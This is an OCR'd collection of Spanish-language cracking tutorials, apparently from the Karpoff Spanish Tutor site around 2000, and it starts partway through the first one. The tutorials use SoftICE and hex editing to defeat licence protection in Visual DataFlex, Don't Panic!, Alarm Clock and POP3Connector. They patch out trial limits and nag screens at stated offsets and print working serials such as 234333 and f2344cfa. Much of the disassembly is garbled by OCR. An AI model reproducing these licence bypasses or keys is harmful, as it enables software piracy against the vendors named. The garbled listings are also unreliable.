:10001425 8d8c1038000000 lea ecx, dword ptr [eax+edx+00000038] 
:1000142c 51 push ecx 

:1000142d e84e120000 call 10002680 

:10001432 83c40c add esp, 0000000c 

:10001435 33c0 xor eax, eax 

:10001437 c3 ret 


para poder probar nuestros descubrimientos ingresaremos: 


serial number: 222222 
registration name: sujeto tacito 
registration code: 88888888-99999999 


a los efectos de intentar pescar el serial vamos a utilizar el softice pero agregando a winice.dat la linea 


exp=carchiv=-1WvdfMbinwinsetup.dll de manera de poder acceder a las funciones que se encuentran dentro de la dll. 
podríamos establecer un bpx registerproduct. el mismo efecto lograríamos estableciendo un bpx hmemcpy luego de 
ingresados los datos, pulsar el botón add, luego dos veces crtl-d para seguirle la pista al código de registro , después 
pulsar algunos f12 para llegar a register.exe (creo que siete para ser mas preciso) y desde ahí y luego de algunos f10 
estaríamos en la misma función. incluso podemos establecer un breakpoint en la función winsetup.generateregcode 
(nombre sugestivo no) y lograr el mismo efecto. 


independientemente del camino que elijamos llegaremos tarde o temprano a la llamada mencionada en el párrafo 
anterior por lo podemos suponer que en: 


:100013ec es 1fffffff call 10001310 


debería estar la rutina que nos lleve al serial correcto. un breakpoint en esta llamada y luego f8 para analizar que 
sucede. 


* referenced by a call at address: 
|:100013ec 


:10001310 8b442408 mov eax, dword ptr [esp+08] 
:10001314 53 push ebx 

:10001315 8b5c2408 mov ebx, dword ptr [esp+08] 
:10001319 56 push esi 

:1000131a 57 push edi 

:1000131b 50 push eax 

:1000131c 53 push ebx 

:1000131d eSdefcffff call 10001000 

:10001322 8b7c2420 mov edi, dword ptr [esp+20] 
:10001326 83c9ff or ecx, f£EfEfff 

:10001329 33c0 xor eax, eax 


:1000132b 53 push ebx 

:1000132c £2 repnz 

:1000132d ae scasb 

:1000132e £7d1 not ecx 

:10001330 2bf9 sub edi, ecx 

:10001332 8b442428 mov eax, dword ptr [esp+28] 
:10001336 8bd1 mov edx, ecx 

:10001338 8bf7 mov esi, edi 

:1000133a 8bfb mov edi, ebx 

:1000133c c1e902 shr ecx, 02 

:1000133f f3 repz 

:10001340 a5 movsd 

:10001341 8bca mov ecx, edx 

:10001343 83e103 and ecx, 00000003 
:10001346 f3 repz 

:10001347 a4 movsb 

:10001348 894334 mov dword ptr [ebx+34], eax 
:1000134b esaOffffff call 100012f0 llamada al cálculo del serial 
:10001350 83c40c add esp, 0000000c 
:10001353 5f pop edi 

:10001354 Se pop esi 

:10001355 5b pop ebx 

:10001356 c3 ret 

con f8 en call 100012f0 llegamos a: 

* referenced by a call at address: 

[:1000134b 


:100012f0 56 push esi 

:100012f1 8b742408 mov esi, dword ptr [esp+08] 

:100012f5 6a58 push 00000058 

:100012f7 56 push esi 

:100012f8 es 13ffffff call 10001210 cálculo del serial. en eax=serial correcto 
:100012fd 8b4e58 mov ecx, dword ptr [esi+58] en ecx=serial ingresado 
:10001300 83c408 add esp, 00000008 

:10001303 3bc8 cmp ecx, eax compara ingresado con calculado 
:10001305 Of94c0 sete al buen chico al=01 

:10001308 5e pop esi 

:10001309 c3 ret 


bien, hemos alcanzado el nudo de nuestra cuestión. en eax obtenemos la primera parte del código de registro (la que 
está antes del guión) ya que el calculo se basa en la segunda parte ingresada (después del guión.). 


luego de la pantalla de error ingresamos nuevamente el serial mostrado en eax y sorpresa hemos registrado una licencia 
para visual dataflex pero versión 6.x, de la versión 7.x nada. el archivo termlist.cfg se ha creado (recuerdan que lo 
habiamos renombrado) en Ybin tal lo esperado, conteniendo el nombre de usuario y las dos partes del código de registro 
claramente visibles en 438h la segunda y en 458h la primera. estos valores no son simetricos respecto a los 
visualizados en 38h y 58h pero si seguimos avanzando un poco podremos ver que la función antes mencionada es 
llamada dos veces y en su segunda vez genera los códigos mostrados en 38h y 58h. además si ingresaramos estos 
últimos códigos obtenidos en la pantalla de registro el archivo termlist generado será simetrico y por ende mostrará los 
mismos valores en sus dos mitades, tal cual pudimos ver con el archivo renombrado. 


aplicando la fuerza bruta (nada de zen) podremos observar que variando la segunda parte del código de registro es 
posible generar códigos correctos entre otros para: 


webapp server 1.x eval, webapp server 2.x 
webapp server 1.x, webapp server 2.x eval 
webapp server 2.x (mp) (sp) 

webapp studio 2.x 


visual dataflex 6.x, webapp studio 1.x runtime 
webapp server 1.x runtime 
visual dataflex 6.x 


es decir todos los existentes menos para visual dataflex 7.x y que independientemente de la cantidad de números 
ingresados luego del guión estaría tomando solamente 7 u 8 a partir de la derecha aunque esto último no lo puedo 
asegurar con precisión. además es posible registrar distintos usuarios y productos dentro del mismo archivo 
termlist.cfg aunque solamente el último ingresado será el activo (a menos que lo modifiquemos mediante el botón set 
default name) los valores mostrados en 68h y 6a (y sus simétricos) muestran la cantidad de licencias registradas y cual 
de ellas es la activa. el valor mostrado en 34h y simétrico representa un valor calculado a partir del número serial 
(222222) y el nombre de registro y en la cual podría estar involucrada la llamda a user32.chartooema aunque de 
momento tampoco lo puedo precisar. 


00000000h: 53 75 6a 65 74 6f 20 54 61 63 69 74 6£ 00 00 00 ; sujeto tacito 
00000010h: 6f 72 61 74 69 6f 6e 00 00 00 00 00 00 00 00 00 

00000020h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

00000030h: 00 00 la 00 Oe 64 03 00 10 18 00 12 00 00 00 00 

00000040h: 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

00000050h: 00 00 00 00 00 00 00 00 2x ex cx 0x 00 00 00 00 

00000060h: 00 00 00 00 00 00 00 00 01 00 01 00 00 00 00 00 


han sido reemplazados algunos valores por x 


[DJregister Your Data Access Worldwide Product b - (0) xj 


Enter Registration Details 


You must registerthe product before you can use it. Enter your 
registration details exactly as printed 


Serial Number: [222222 
Registration Name: [Sujeto Tacito 
Registration Code: [xcxex2%-1 2001810 


TExisting Registration: 
[Product | RegisteredName | Serial Num_| 
«2» Visual DataFlex 6.x Sujeto Tacito 222222 
SetDefaultWName Delete Registration 


Wersion: 2.0 
Copyright: 1999 Data 4ccess Corporation ose | 


no difundiré los códigos de registro obtenidos ya que no es propósito de este manual perjudicar a la empresa 


dataaccess en modo alguno, sino solamente analizar la implementación de su esquema de protección. 


dado mi reciente comienzo con la ingeniería inversa creo no tener los suficientes conocimientos del ensamblador para 
poder analizar en forma correcta la llamada a la función del calculo del serial (y no porque no lo haya intentado) en: 
:100012f8 eS 13ffffff call 10001210 


y que me permitiría hechar algo de luz respecto al código para la versión 7.x del producto e incluso poder crear un 
keygen. 


hasta el momento solamente he podido averiguar lo siguiente: 
1. la posición 3ch y 43ch, en termlist.cfg, debe ser 01 para generar un serial correcto para la versión 7.x 


esta es aparentemente la única diferencia que existiría respecto a la de la versión 6.x ya que las llamadas a las 
rutinas de generación son las mismas en ambos productos. no he podido determinar si este valor forma parte del 
código de registro. 


2. la sección de código en la que determina si el producto es el de evaluación o el adquirido al comprar el producto 
es: 
* referenced by a (u)nconditional or (c)onditional jump at address: 
|:10001d7e(c) 


:10001d8a 8b15d8940010 mov edx, dword ptr [100094d8] 

:10001d90 64a12c000000 mov eax, dword ptr fs:[0000002c] 

:10001d96 clel0a shl ecx, Oa ecx = 400h 

:10001d99 8b1490 mov edx, dword ptr [eax+4*edx] 

:10001d9c 56 push esi 

:10001d9d 8d340a lea esi, dword ptr [edx+ecx] 

:10001da0 8b9670000000 mov edx, dword ptr [esi+00000070] apunta al valor 438h en termlist 
:10001da6 8b8674000000 mov eax, dword ptr [esi+00000074] apunta a 43c y debe ser = 01 
:10001dac £7c200000002 test edx, 02000000 compara 

:10001db2 89542418 mov dword ptr [esp+18], edx almacena el valor de 438h 

:10001db6 89442410 mov dword ptr [esp+10], eax almacena el 01 de 43ch 

:10001dba 746a je 10001e26 debe saltar a 1e26 

* referenced by a (u)nconditional or (c)onditional jump at address: 

|:10001dba(c) 


:10001e26 f644241001 test [esp+10], 01 and 43ch , 01 

:10001e2b 746a je 10001e97 no salta 

:10001e2d £7c200008000 test edx, 00800000 and 43ch, 800000 
:10001e33 bd0b000000 mov ebp, 0000000b 

:10001e38 7405 je 10001e3f debe saltar 

:10001e3a bd0c000000 mov ebp, 0000000c chico malo 

* referenced by a (u)nconditional or (c)onditional jump at address: 
|:10001e38(c) 


:10001e3f 8b3cad38800010 mov edi, dword ptr [4*ebp+10008038] 


es decir ebp contiene el valor b que va a permitir luego del cálculo que edi apunte a la dirección 1000842c la 
que contiene el string "visual dataflex 7.x". 


si ebp = c el valor obtenido del cálculo será 1000840c que apunta a "visual dataflex 7.x evaluation" 
3. en esta última parte del código es donde se generan los nombres de los diferentes productos a través de 


sucesivas comparaciones con la segunda parte del código de registro ingresado o leido de termlist.cfg en el caso 
de existir. (llamadas a winsetup. getregistrationname) 


por lo expuesto, este manual se encuentra inconcluso hasta que alguien con mayor conocimiento o experiencia pueda 
terminarlo o en su defecto pueda brindarme la ayuda necesaria para poder concluirlo. 


sujeto tacito 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


introduccion 


esta maravilla de programa tiene una gran utilización. aquí el comentario que saqué de softonic: 


oculta cualquier aplicación y avisa al resto de la oficina. don't panic! es algo más que un simple limpiador 
del historial de tu navegador. te permite abrir y cerrar al instante cualquier ventana con una sola pulsación, clic o 
movimiento de ratón. permite borrar los ficheros de internet, incluyendo el historial de páginas web visitadas, el 
historial de ficheros descargados, cookies y caché. también permite borrar todos los rastros que deja windows, 
como los documentos vistos recientemente, el portapapeles, la papelera de reciclaje, etc... 

todas estas opciones se pueden automatizar. 

don't panic! te permite asignar teclas a todas sus funciones para poder usarlo sin que se detecte, y lanzar cualquier 
aplicación, documento o página web. 

también tiene un curioso modo para su uso en lan; es el "sistema de alerta global", que permite alertar o ser 
alertado por otros usuarios de don't panic! cuando se acerque algún jefe, avisando con un icono de alerta en la 
barra de tareas de windows. 

permite ocultar programas específicos, como icq, napster, etc.. mientras se mantienen el resto de programas 
funcionando con aparente normalidad. es compatible tanto con internet explorer como con netscape. 


les recomiendo este programa. cuando está corriendo, también se puede cambiar el icono que se mostrará en la 
barra de tareas!. 


E el factor principal E 


analizamos el ejecutable con el file inspector y vemos que las cosas van a ser más fáciles de lo que creíamos. programa no 
empaketado, no encryptado, hecho en visual c++ 5.0. vamos bien j 


si nos bajamos la versión de evaluación tenemos las siguientes limitaciones: 


pasados los 30 días el programa deja de funcionar 

no podemos usar la opción de network 

tenemos una nag al principio que nos dice cuantos días nos quedan 
la palabra demo por todos lados 


creo ya podemos iros deshaciendo de la última. solamente debemos abir nuestro editor hexadecimal favorito y buscar las 
palabras demo demo demo, recuerden que los caracteres minúsculas y mayúsculas son diferentes en el código ascii. cuando 
los encontremos los rellenamos con espacios y listo. esta no es ningún problema. 


ahora nos vamos a algo más complicadillo, empezaremos por crackear el límite de tiempo. cerramos todos los programas que 
tengamos en ejecución, [ctrl+d] y pondremos 2 típicos breakpoints. bpx getlocaltime y bpx getsystemtime. las dos apis 
se usan para extraer el tiempo del sistema. aquí el funcionamiento de getlocaltime: 


void( 
/Idirección de estructura de tiempo del sistema (apunta a una 


lpsystemtime lpsystemtime 
PSy psy estructura 


hi systemtime para recibir la fecha y el tiempo del ordenador) 


el funcionamiento de getsystemtime es prácticamente el mismo solo que el tiempo se expresa en tiempo universal coordinado 
(utc, siglas en inglés). 


recuerden, traten de cerrar casi todos los programas en ejecución ya que estas dos apis son muy utilizadas por los 
programas, si no lo hacen el sice saltará permanentemente. presionen [crtl+alt+supr] y cierren la mayor cantidad de cosas 
posibles. cuando pusimos los breakpoints, ejecutamos el don't panic y enseguida saltamos al sice. ahora a darle a f12 hasta 
llegar a dp!.text+xxxx (donde xxxx es un número hexadecimal de 4 cifras). cuando lleguemos a dp! le damos a f12 hasta 
llegar a la rutina "semi-padre" de todas. concretamente hasta aquí: 


:00410b9f 8leccco00000O sub esp, 000000cc 

:00410ba5 8d45f£0 lea eax, dword ptr [ebp-10] 

:00410ba8 50 push eax 

:00410ba9 ff15a4904100 call [kernel32!getlocaltime] : extrae la hora del sistema 

:00410baf 8d45e0 lea eax, dword ptr [ebp-20] 

:00410bb2 50 push eax 

:00410bb3 ff158c914100 Call [kernel32!getsystemtime] : extrae la fecha del sistema 

:00410bb9 668b45ea mov ax, word ptr [ebp-16] 

:00410bbd 663b05da284200 Ccmp ax, word ptr [004228da] 

:00410bc4 753b jnz 00410c01 

:00410bc6 668b45e8 mov aX, word ptr [ebp-18] 

:00410bca 663b05d8284200 cmp ax, word ptr [004228d8] ; se realizan una serie de 

:00410bd1 752e jnz 00410001 O O OS 
serviran 

:00410bd3 668b45e6 mov aX, word ptr [ebp-1la] ; para nada 

:00410bd7 663b05d6284200 cmp ax, word ptr [004228d6] 

:00410bde 7521 jnz 00410c01 

:00410be0 668b45e2 mov ax, word ptr [ebp-1le] 

:00410be4 663b05d2284200 Ccmp ax, word ptr [004228d2] 

:00410beb 7514 jnz 00410c01 


:00410bed 668b45e0 mov aX, word ptr [ebp-20] 

:00410bf1 663b05d0284200 Ccmp ax, word ptr [004228d0] 

:00410bf8 7507 jnz 00410c01 

:00410bfa alc8284200 mov eax, dword ptr [004228c8] 

:00410bff eb45 jmp 00410c46 

:00410c01 8d8534ffffff lea eax, dword ptr [ebp+ffffff34] 

:00410c07 50 push eax 

:00410c08 f£f1590914100 Call [kerne132!gettimezoneinformat ion] 3 [Taducs la fecha obtenida en 
:00410c0e 83f8ff cmp eax, ffffffff por getsystemtime a formato 
:00410c11 741b jz 00410c2e tiempo local 


por aquí la cosa empieza a ser sospechosa. lo que tendríamos que hacer ahora sería buscar un salto abajo pero como de 
saltos está lleno buscaremos una call xxxxxxx (donde xxxxxxx es una dirección de memoria y no una api). le vamos 
dando a £10 hasta encontrar una call interesante y aquí está!: 


:00410c5f 50 push eax 

:00410c60 Of£b745£0 A 5% MERA BOL. [ERES 

:00410Cc64 50 push eax 

:00410C65 eSe1310000 call 00413e4b > llamada a la rutina que determina sí 
estamos 

:00410c6a 8b4d08 mOv ecx, dword ptr [ebp+08] ; dentro de los 30 días de evaluación 

:00410c6d 83c41c add esp, 0000001c 

:00410c70 8509 test ecx, ecx ; compara si el flag devuelto es O 

:00410c72 7402 jz 00410c76 ; s1ies así, hemos expirado 

:00410c74 8901 mov dword ptr [ecx], eax 

:00410Cc76 c9 leave 

:00410c77 c3 ret ; retorno, devuelve 


sería lógico pensar que deberíamos cambiar el jz por jnz pero si ejecutamos el don't panic no arranca. en estos casos 
debemos nopear la call. para calcular el offset de la call necesitamos o el w32dasm, o el krackpe de numit_or o el 
propio file inspector de viper. 

en este caso utilizaremos el file inspector, vamos a herramientas/rva to offset e introducimos la dirección de memoria 
de la call añadiendo la base. en mi caso da offset 10c65. 


abrimos nuestro editor hexadecimal, vamos a ese offset y cambiamos e8 el 31 00 00 por 90 90 90 90 90 o sino por 40 
48 40 48 40. probamos el programa y bien!!! dice que nos quedan 30 días. tan solo para cerciorarnos adelantamos la 
fecha del sistema 1 año y wow! siguen quedándonos 30 días de evaluación!. esto nos demuestra una cosa: 


límite de tiempo fuera!!! 


ya hicimos lo principal y ahora nos queda la nag. esta vez no utilizaremos los típicos breakpoints para las nags como 
createwindowexa o dialogboxparama, sino que utilizaremos los windows messages. generalmente con las nags son más 
efectivos qué los breakpoints típicos. ejecutamos el don't panic sin el límite de tiempo y cuando aparezca la nag no pulsen 
continue evaluation sino [ctrl+d] para entrar al sice. luego escriban hwnd para ver el handle de las ventanas que se están 
mostrando y luego presionen enter (traten de cerrar todas las otras ventanas para que solo se muestre la nag del don't 
panic). el dp.exe que era el ejecutable original lo he renombrado como crackeado.exe o sea que en qowner. ahora estudien 
los handles de las ventanas que se muestran pero que siempre vean los que en qowner digan crackeado (en mi caso, claro). 
se muestran 6 handles con crackeado en qowner. el que me pareció más interesante es este: 


windows handle hqueue SZ qowner class name windows procedure 


03c8(1) 


32 crackeado 


+32770 (dialog) 178£:000050b1 


me llamó la atención por que dice (dialog) en class name. ahora vamos a poner un break point para que cuando pulsemos el 
botón de "continuar" saltemos al sice. recuerden que el handle de la ventana y los demás datos cambian cada vez que 
ejecutas el programa. debemos poner un bmsg + handle + wm_destroy. esta vez no usaremos wm_enable o wm_command. 
en mi caso pondré bmsg 03c8 wm_destroy. si tienes alguna duda de los windows messages léete el tutorial de mi amigo 
kuato_thor sobre tutorial sobre passmark-burnintest 2.0, ahí explica algo sobre los windows messages. 


cuando hayas puesto el break point pulsa sobre continue evaluation y enseguida saltas al sice!. ahora a darle a f12 hasta 
llegar al código del crackeado.exe. concretamente hasta este punto: 


:0040ab95 05c0655200 add eax, 005265c0 

:0040ab9a 6200 push 00000000 

:0040ab9c a350234200 mov dword ptr [00422350], eax 

:0040abal e82adoffff call 00407bd0 ; genera la ventana 
:0040aba6 830404 add esp, 00000004 

:0040aba9 85c0 test eax, eax ; flag devuelto = 0 
:0040abab 7426 jz 0040abd3 ; muestra la ventana 
:0040abad 8b1544234200 mov edx, dword ptr [00422344] ,sies 1 

:0040abb3 a140234200 mov eax, dword ptr [00422340] ; no la muestra 
:0040abb8 6200 push 00000000 

:0040abba 68807d4000 push 00407d80 

:0040abbf 52 push edx 

p ; si el demo ha expirado dice lo de 
:0040abcO 68b4da4100 push 0041dab4 evaluation time expired! 
:0040abc5 50 push eax 

:0040abc6 ff15e0924100 call [user32!dialogboxparama] ; aquí nos paramos 
:0040abcc bd01000000 mov ebp, 00000001 

:0040abd1 eb29 jmp 0040abfc 

:0040abd3 ala0114200 mov eax, dword ptr [00421120] 

:0040abd8 85c0 test eax, eax 

:0040abda 7520 jnz 0040abfc 

:0040abdc 8b0d44234200 mov ecx, dword ptr [00422344] 

:0040abe2 8b1540234200 mov edx, dword ptr [00422340] 

:0040abe8 6200 push 00000000 

:0040abea 68907c4000 push 00407c90 

:0040abef 51 push ecx 

:0040abf0 68a4da4100 push 0041daa4 ; texto y título de la ventana 
:0040abf5 52 push edx 


por si acaso borramos todos los break points que hayamos puesto y ponemos uno en el salto (bpx 40abab), pulsamos 


continuar y si!, salta. invertimos el flag con r fl z y no sale la nag. creo que lo que haremos está claro. deberemos cambiar el 
jz 0040abd3 a ¡nz 0040abd3. el offset lo calculamos de la misma manera que lo hicimos antes. abrimos el editor hexadecimal, 
cambiamos el 74 a 75 y wow!. 


fuera nag!!! 


finalizando 


ahora sólo nos quedaría habilitar la opción de network, pero ese trabajo se los dejo a ustedes como tarea. les comunico una 
cosa, que este crack que hicimos es el primero de todo el mundo, bueno, el segundo ya que yo lo hice antes. 


Saludos a: 
e mr.jade 


e Xasx 


karpoff 

e skuater 

e act mago 
e todo [k-for] 


txeli (sigue así!) 


quisiera agradecer sobre todo a profesor x ya que sin su apoyo no hubiera crackeado este programa ni escrito estas líneas. 
gracias profe!. saludos a todos ustedes que leen mis manuales. recuerden, no acepto pedidos de cracks!!!. 


nos vemos en el próximo tutorial amigos!, 


enjoy!!! 


dek_oin/k-for 


karpoff spanish tutor: pagina dedicada a la dibulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


Alarm Clock v2.11 


Serial 
Conseguir un número de serie válido 
Es una alarma 


Newbie 


http://www .saltwell.demon.co.uk/software/ 
file insPEctor v3.0 y Softl ce v4.05 
Act Mago FECHA: 08/11/2000 


introduccion 


hola amigos, presento mi décimo tutorial.ya saben, si tienen alguna duda sólo pregúntenlo 
actmagoO hotmail.com , como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u 


otras cosas. en este tutorial seguiremos usando el softice. si no lo tienes instalado puedes bajártelo en 
www. crackstore.com . asumo que tienes conocimientos básicos sobre el uso de softice. y para terminar con la intro 


debo decir : este texto ha sido escrito sólo con propósitos educacionales. 


al atake 


abrimos el programa y lo primero que vemos es esto: 


Alarm Clock (Unregistered) 


Alarm Clock Version 2.11 
Copyright € John Hudson. January 2000 
Uniegiateied Copy - For Evaluation On 
If you are still using this program after one 


month, please register it for the low fee 
shown in he accompanying Help File ES 


no quieren que se nos olvide que el programa es shareware : ) 


le damos click a OK y vamos a la barra de tareas o task bar; hacemos click con el botón derecho del mouse y veremos las 
opciones entre las que se encuentra register, le damos click y estaremos por fin en la caja de registro, la que nos pide los 
siguientes datos: 


registration number: 
name: 


como siempre hacemos llenamos la caja con nuestro nombre y cualquier serial number, luego damos click en OK y por 
supuesto que el programa no aceptará el número de registro y nos mostrará un mensaje como este... 


Alarm Clock - Register 


Type your registration number below: 


ñ 233321 


Your name Colina 2 characters) 
¡Act MagO 


a continuación... cerramos alarm clock. 


debemos recopilar la mayor cantidad de información para saber por donde atacar a este programa y para eso utilizaremos el 
genial file inspector v3.0 el que nos mostrará si está encriptado y también en que leguaje está hecho. abrimos file 
inspector v3.0 ,luego vamos a abrir archivo, y cuando hayas abierto el ejecutable ac2.exe , luego le damos click a 
analizar y luego a la lengúeta que dice compilador...se verá así: 


2, -= file insPEctor v3.0 - By VIPER [ K-FOR ] - Released 23/10/00 =- 


Datos PE | Secciones | Importaciones/Exportaciones ¿£ | Herramientas ] Acerca de... | 


¡Reconocimiento de signaturas 
Compilador: Borland Delphi 3.0 
Signatura: 
Versión de la DLL: hi 0 Información... ED Asociar EXE “s 


Versión del enlazador: [2.25 Versión de la imagen: fo.o 
Versión del SO: fi 0 Versión del subsistema: [4.0 


ES Abrir archivo... 5] Analizar GÍ Salir 


[CSWINDOWStac2.exe [ 


con la información que tenemos creo que el camino más fácil y limpio será usar nuestro querido softice para conseguir un 
número de serie válido. 


a continuación... cerramos file inspector v3.0. 


usando softice 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos sobre su uso. 


a continuación...abrimos alarm clock y vamos directamente a la caja de registro en donde introducimos nuestro nombre y 
cualquier número de serie . todavía no damos click en OK ; lo que ahora debemos hacer es presionar control+d para que 
salte el softice y así poder colocar nuestro breakpoint. 


ya estamos dentro del softice...colocamos bpx hmemcpy y presionamos enter, luego presionamos f5 para salir del softice. 
ahora le damos click a OK y si todo sale bien el bpx debería picar y hace saltar al softice. 


luego presionamos f11 1 vez --------- > f12 11 veces, ponemos bc * para quitar el bpx y estaremos aquí: 
015f: 004571c0 8b45f8 mov eax,[ebp-08] 

luego F10 2 veces para llegar aquí: 

015f: 004571c8 8945fc mov [ebp-04],eax 

si aquí colocamos d eax la window data se queda en blanco, pero si colocamos ? eax veremos esto: 
0001233321 

luego le damos a f10 4 veces para llegar aquí... 

015f: 004571d8 3b45fc cmp eax, [ebp-04] 


esta comparación es demasiado sospechosa como para dejarla de lado, por lo tanto colocamos d eax y la window data 
muestra un desorden de letras, entonces colocamos ? eax y veremos esto... 


0000234333 

al parecer lo hemos conseguido, pero... cómo estar seguros ? 
si presionamos f10 1 vez llegaremos a este salto... 

015f: 004572db Of8506010000 jnz 004572e7 


si aquí colocamos r fl z y luego damos f5 registraremos el programa pero sólo hasta volver a iniciarlo. como ya sabemos la 
función de aquella comparación ahora estamos seguros de que el número que hemos obtenido es válido. 


entonces la caja de registro quedaría así: 

registration number: 234333 

name: act mago 

mientras escribía este tutorial me registre con otro nombre de usuario por lo tanto la caja quedaría así: 
registration number: 234333 

name: (cualquiera) 


le damos click a OK y la caja ha aceptado nuestro código de registro, vamos a about alarm clock... y veremos esto: 


About Alarm Clock 


Alarm Clock Version 2.11 
Copyright € John Hudson, January 2000 


Registered to ot MagO 


programa crackeado... 


nota: 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmagoO hotmail.com 


saludos 


e saludos a tnt!crack!team ( saludos a xasx, no parare : ) ) 


e saludos a dek_oin. 
e saludos y agradecimientos a vi per del grupo [k-for], por el genial file inspector. 


e saludos a toda la people de tutoriales2000. 
e saludos a profesor x. 


e saludos al Ida (monofeo (gran amigo), flaco (te pillaron! , jaja!!), chirda, taza, afo, solerman, nasal, peter 
y a todos los demás) 


e saludos a todos los crackers del mundo. 


chao!! 


espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


actmagoO hotmail.com 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


Karpoff Spanish Tutor 


Pop3connector V4.10 


PROTECCION: Serial 
Objetivo: Conseguir un número de serie válido 
Descripcion: para chequear el correo electrónico 
Dificultad: Newbie 
DOWNLOAD : http: //members.xoom.conypop3con 
Herramientas: Softice 4.05, file insPEctor 3.0 
CRACKER: Act Mago FECHA: 08/11/2000 
INTRODUCCION 
Introducción 


hola amigos, presento mi décimo primer tutorial.ya saben, si tienen alguna duda sólo pregúntenlo 
actmagoO hotmail.com , como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u 


otras cosas. en este tutorial seguiremos usando el softice. si no lo tienes instalado puedes bajártelo en 
www. crackstore.com . asumo que tienes conocimientos básicos sobre el uso de softice. y para terminar con la intro 


debo decir : este texto ha sido escrito sólo con propósitos educacionales. 


comentario del programa 


programa que sirve para chequear el correo electrónico. 


el programa es shareware, tiene libre uso de 15 días, por lo que si quieres seguir usándolo después de este período 


debes registrarte. 


contamos con softice... 


al atake 


abrimos el programa y todo se ve normal, no hay nags ni pantallas invitándonos a conseguir un código de registro. pero si 
vamos a help nos encontraremos con la opción registration, a la que le damos click y nos encontramos con la caja de 
registro la que en este caso nos entrega un product id, pero vamos al grano, en mi caso la caja se ve así: 


Registeration El 


Product ID. [?8DC54DE343E20E8 
User name X Cancel | 


User e-mail 
Product Key Get Key | 


como hacemos siempre llenamos la caja con cualquier dato, le damos click a register y por supuesto que el programa no 
aceptará el código de registro y nos mostrará un mensaje como este... 


POP3Connector 4.10 Xx] 


Invalid product key! Reoistration aborted 


a continuación... cerramos pop3connector. 


debemos recopilar la mayor cantidad de información para saber por donde atacar a este programa y para eso utilizaremos el 
genial file inspector v3.0 el que nos mostrará si está encriptado y también en que leguaje está hecho. abrimos file 
inspector v3.0 ,luego vamos a abrir archivo, y cuando hayas abierto el ejecutable pop3_4.exe , luego le damos click a 
analizar y luego a la lengúeta que dice compilador...se verá así: 


8, -< file insPEctor v3.0 - By ViPER [ K-FOR ] - Released 23/10/00 =- 


€. 


] Herramientas | Acerca de... | 


Datos PE | Secciones | Importaciones/Exportaciones ¿ 


Reconocimiento de signaturas 
Compilador; Borland Delphi 3.0 
Signatura; 
Versión de la DLL: fi 0 Información... ED Asociar EXE 's 


Versión del enlazador: [2.25 Versión de la imagen; fo.o 
Versión del 50; In 0 Versión del subsistema; [4.0 


ES Abrir archivo... ¿58 Analizar GH salir 
¡Esiárchivos de programaPOP3CormectoriStandardipop3_4.exe | 


con la información que tenemos creo que el camino más fácil y limpio será usar nuestro querido softice para conseguir un 
código de registro real. 


a continuación... cerramos file inspector v3.0. 


usando softice 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos sobre su uso. 

a continuación...abrimos pop3connector y vamos directamente a la caja de registro en donde introducimos nuestro nombre, 
nuestro e-mail y cualquier código de registro. todavía no damos click en register ; lo que ahora debemos hacer es 
presionar control+d para que salte el softice y así poder colocar nuestro breakpoint. 


ya estamos dentro del softice...colocamos bpx hmemcpy y presionamos enter, luego presionamos f5 para salir del softice. 
ahora le damos click a register y si todo sale bien el bpx debería picar y hace saltar al softice. 


luego presionamos f11 1 vez --------- > f12 11 veces, ponemos bc * para quitar el bpx y estaremos aquí: 
015f: 004aaf9f 8d55f8 lea edx,[ebp-08] 
luego f10 7 veces para llegar aquí: 


015f: 004aafb7 8bc3 mov eax,ebx --------- > d edx = actmagoO'hotmail.com y si colocamos d ecx = 1233321 (número 
falso) 


después de ver esto nos damos cuenta que vamos por buen camino... : ) 
ahora presionamos f1O 3 veces y llegamos aquí: 

015f: 0O04aafc1 8b55f8 mov edx,[ebp-08] 

nos paramos aquí y colocamos d edx para ver esto... 


actmagoO hotmail.com 


y si colocamos d eax veremos esto... 

f2344cfa 

creo que ya lo tenemos, ahora debemos presionar f10 1 vez para llegar aquí... 

015f: 004aafc4 es278ff5ff call 0O403€ef0 ------- > presionamos f8 para entrar a inspeccionar esta parte del código. 
después de darle a f8 debemos estar aquí... 

015f: 00403ef0 53 push ebx 

si aquí colocamos d edx veremos esto: 

1233321 (mi número de registro falso) 

y si colocamos d eax veremos esto: 

f2344cfa 

de aquí en adelante nuestro código y número de registro falso estarán por todas partes. 

abajo hay una comparación a la que llegamos presionando f10 5 veces. 

015f: 00403ef7 39d0 cmp eax,edx -------- > d eax = f2344cfa y si colocamos d edx = 1233321 


aquí el programa compara el código verdadero con que hemos introducido. 


ya lo hemos hecho, ahora sólo debemos colocar los mismos datos que habíamos colocado entes de entrar al softice pero 
obviamente variando el código de registro. 


en mi caso la caja quedaría así... 
product id : 76dc54d6343e20e8 
user name: act mago 


user e-mail: actmagoO hotmail.com 


product key: f2344cfa 


le damos click a register y veremos esto: 


POP3Connector 4.10 Xx] 


Registration was successful You must reload the program for cahges take effect 


programa crackeado... 


nota: 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmagoO hotmail.com 


saludos 


e saludos a Inticrack!team ( saludos a xasx, no parare : ) ) 


e saludos a dek_oin. 
e saludos y agradecimientos aV| per del grupo [k-for] , por el genial file inspector. 
e saludos a toda la people de tutoriales2000. 


e saludos a profesor x. 


e saludos al Idea (monofeo (gran amigo), flaco (te pillaron! , jaja!!), chirda, taza, afo, solerman, nasal, peter 
y a todos los demás) 


e Saludos a todos los crackers del mundo. 


chao!! 


